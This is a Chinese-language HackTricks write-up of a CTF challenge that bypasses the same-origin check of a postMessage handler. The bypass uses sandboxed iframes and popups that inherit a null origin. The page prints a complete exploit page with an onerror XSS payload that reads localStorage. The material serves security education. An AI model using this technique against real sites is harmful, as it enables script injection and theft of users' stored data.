Bypassing SOP with Iframes - 1

从零开始学习AWS黑客技术 htARTE（HackTricks AWS红队专家）！

您在网络安全公司工作吗？您想看到您的公司在HackTricks中做广告吗？或者您想访问PEASS的最新版本或下载HackTricks的PDF吗？请查看订阅计划！
发现我们的独家NFTs收藏品The PEASS Family
获取官方PEASS和HackTricks衣物
加入 💬 Discord群 或 电报群 或在Twitter上关注我 🐦@carlospolopm。
通过向hacktricks repo和hacktricks-cloud repo提交PR来分享您的黑客技巧。

SOP-1中的Iframes

在由NDevTK和Terjanq创建的挑战中，您需要利用代码中的XSS。

const identifier = '4a600cd2d4f9aa1cfb5aa786';
onmessage = e => {
const data = e.data;
if (e.origin !== window.origin && data.identifier !== identifier) return;
if (data.type === 'render') {
renderContainer.innerHTML = data.body;
}
}

主要问题在于主页使用DomPurify发送data.body，因此为了将您自己的html数据发送到该代码，您需要绕过e.origin !== window.origin。

让我们看看他们提出的解决方案。

SOP绕过 1 (e.origin === null)

当//example.org被嵌入到一个受沙箱保护的iframe中时，页面的origin将为**null，即window.origin === null。因此，只需通过<iframe sandbox="allow-scripts" src="https://so-xss.terjanq.me/iframe.php">嵌入iframe，我们就可以强制null origin**。

如果页面是可嵌入的，您可以通过这种方式绕过该保护（可能还需要将cookie设置为SameSite=None）。

SOP绕过 2 (window.origin === null)

较少人知道的事实是，当设置沙箱值allow-popups时，打开的弹出窗口将继承所有受沙箱保护的属性，除非设置了allow-popups-to-escape-sandbox。因此，从null origin打开一个弹出窗口将使弹出窗口内部的**window.origin也变为null**。

挑战解决方案

因此，对于这个挑战，可以创建一个iframe，打开一个弹出窗口到具有易受XSS代码处理程序（/iframe.php）的页面，因为window.origin === e.origin，因为两者都是null，所以可以发送一个将利用XSS的有效负载。

该有效负载将获取标识符并将一个XSS发送回顶部页面（打开弹出窗口的页面），该页面将更改位置到易受攻击的/iframe.php。因为标识符是已知的，所以不需要满足条件window.origin === e.origin（请记住，origin是来自具有origin null的iframe的弹出窗口）因为data.identifier === identifier。然后，XSS将再次触发，这次在正确的origin中。

<body>
<script>
f = document.createElement('iframe');

// Needed flags
f.sandbox = 'allow-scripts allow-popups allow-top-navigation';

// Second communication with /iframe.php (this is the top page relocated)
// This will execute the alert in the correct origin
const payload = `x=opener.top;opener.postMessage(1,'*');setTimeout(()=>{
x.postMessage({type:'render',identifier,body:'<img/src/onerror=alert(localStorage.html)>'},'*');
},1000);`.replaceAll('\n',' ');

// Initial communication
// Open /iframe.php in a popup, both iframes and popup will have "null" as origin
// Then, bypass window.origin === e.origin to steal the identifier and communicate
// with the top with the second XSS payload
f.srcdoc = `
<h1>Click me!</h1>
<script>
onclick = e => {
let w = open('https://so-xss.terjanq.me/iframe.php');
onmessage = e => top.location = 'https://so-xss.terjanq.me/iframe.php';
setTimeout(_ => {
w.postMessage({type: "render", body: "<audio/src/onerror=\\"${payload}\\">"}, '*')
}, 1000);
};
<\/script>
`
document.body.appendChild(f);
</script>
</body>

从零开始学习AWS黑客技术，成为专家 htARTE（HackTricks AWS Red Team Expert）！

你在网络安全公司工作吗？想要看到你的公司在HackTricks上做广告吗？或者想要获取PEASS的最新版本或下载HackTricks的PDF吗？查看订阅计划!
探索PEASS家族，我们独家的NFTs
获取官方PEASS & HackTricks周边
加入 💬 Discord群 或 电报群 或关注我的 Twitter 🐦@carlospolopm.
通过向hacktricks仓库和hacktricks-cloud仓库提交PR来分享你的黑客技巧。

上一页Blocking main page to steal postmessage 下一页Bypassing SOP with Iframes - 2

最后更新于7个月前